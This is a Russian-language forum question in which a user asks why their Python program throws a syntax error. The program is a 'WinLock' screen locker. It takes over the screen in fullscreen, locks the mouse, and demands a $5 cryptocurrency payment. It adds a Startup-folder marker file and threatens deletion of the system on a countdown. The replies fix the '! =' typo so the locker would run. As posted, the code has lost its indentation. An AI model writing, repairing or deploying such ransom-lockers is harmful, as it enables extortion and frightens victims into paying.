Выдаёт синтексическую ошибку в коде на языке Python.

hyy yrtyrth Ученик (68), закрыт 4 года назад
Выдаёт Синтаксическую ошибку.
Вот код :

from tkinter import *
import pyautogui
import os
import os.path
read1ng = " "
BTC = "BTC: wallet"
LTC = "LTC: wallet"
ETH = "ETH: wallet"
SORRYBRO = ""

LOCKFILE = r'C:\Users\%s\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system.logger'

password = ("lol")
t1me = 7000
d3l = "Удаление системы начато..."

def block():
pyautogui.moveTo(x=670, y=890)
screen.update()

def password_check(event):
global read1ng
read1ng = field.get()
if read1ng == password:
screen.destroy()

def systemrun():
os.system("audacity")

if(os.path.exists(LOCKFILE)):
SORRYBRO = "Вы перезагрузили компьютер, удаление начато..."
t1me = 300
open(LOCKFILE, 'tw', encoding='utf-8').close()
screen = Tk()
screen.title("WinLock")
screen.attributes("-fullscreen", True)
screen.configure(background="#1c1c1c")
pyautogui.FAILSAFE = False
field = Entry(screen, fg="green", justify=CENTER, borderwidth=0)
but = Button(screen, text="Разблокировать", borderwidth=0)
text0 = Label(screen, text="Ваша система заблокирована!", font="TimesNewRoman 30", fg="white", bg="#1c1c1c")
DontPanic = Label(screen, text="Не паникуй, это не шифровальщик, твои файлы в полном порядке\nЭта программа только может стереть твою систему с лица Земли, тебе нечего бояться!", font="TimesNewRoman 24", fg="white", bg="#1c1c1c")
text = Label(screen, text="Вам необходимо перечислить 5$ на один из нижеприведённых кошельков", font="TimesNewRoman 30", fg="#32CD32", bg="#1c1c1c")

REMOV = Label(screen, text=SORRYBRO, font="TimesNewRoman 40", fg="red", bg="#1c1c1c")
REMOV.place(x=400, y=40)

BTCimg = PhotoImage(file='./BTC-little.png')
LTCimg = PhotoImage(file='./LTC-little.png')
ETHimg = PhotoImage(file='./ETH-little.png')

BTClabel = Label(screen, image=BTCimg, borderwidth=0).place(x=350, y=420)
LTClabel = Label(screen, image=LTCimg, borderwidth=0).place(x=350, y=570)
ETHlabel = Label(screen, image=ETHimg, borderwidth=0).place(x=350, y=720)

textBTC = Label(screen, text=BTC, font="TimesNewRoman 16", fg="yellow", bg="#1c1c1c")
textLTC = Label(screen, text=LTC, font="TimesNewRoman 16", fg="yellow", bg="#1c1c1c")
textETH = Label(screen, text=ETH, font="TimesNewRoman 16", fg="yellow", bg="#1c1c1c")
text1 = Label(screen, text="Не перезагружайте компьютер, это удалит вашу систему!", font="TimesNewRoman 16", fg="red", bg="#1c1c1c")
Citate = Label(screen, text="Лох не мамонт, лох не вымрет. \n© Сократ", font="TimesNewRoman 16", fg="red", bg="#1c1c1c")
l = Label(text=t1me, font="Arial 22", fg="red", bg="#1c1c1c")
l1 = Label(text="До удаления системы осталось:", fg="white", bg="#1c1c1c", font="Arial 15")
but.bind('', password_check)
text.place(x=300, y=170)
DontPanic.place(x=300, y=240)
field.place(width=150, height=50, x=600, y=790)
but.place(width=150, height=50, x=600, y=860)
text0.place(x=600, y=110)
text1.place(x=410, y=330)

textBTC.place(x=410, y=430)
textLTC.place(x=410, y=580)
textETH.place(x=410, y=730)
l1.place(x=20, y=70)
l.place(x=20, y=100)
Citate.place(x=900, y=820)
screen.update()
pyautogui.moveTo(x=670, y=890)

while read1ng! = password:
l.configure(text=t1me)
screen.after(200)
if t1me == 0:
t1me = d3l
systemrun()

if t1me! = d3l:
t1me = t1me-1
block()

Лучший ответ
Алексей Большунов Мудрец (10956) 4 года назад
В цикле while оператор присвоения "=" не употребляется.
Скорее всего вы хотели употребить там оператор неравенства "!=", но вставили пробел, а восклицательный знак прицепили к имени переменной.
Или хотели написать оператор равенства "==", больше или равно ">=", или меньше или равно "<=", но первую часть оператора не написали.
Остальные ответы
Elepsis Eclipse Гений (64067) 4 года назад
Ну так...

while read1ng != password:

P.s. read1ng - такое название переменной == потенциальная ошибка.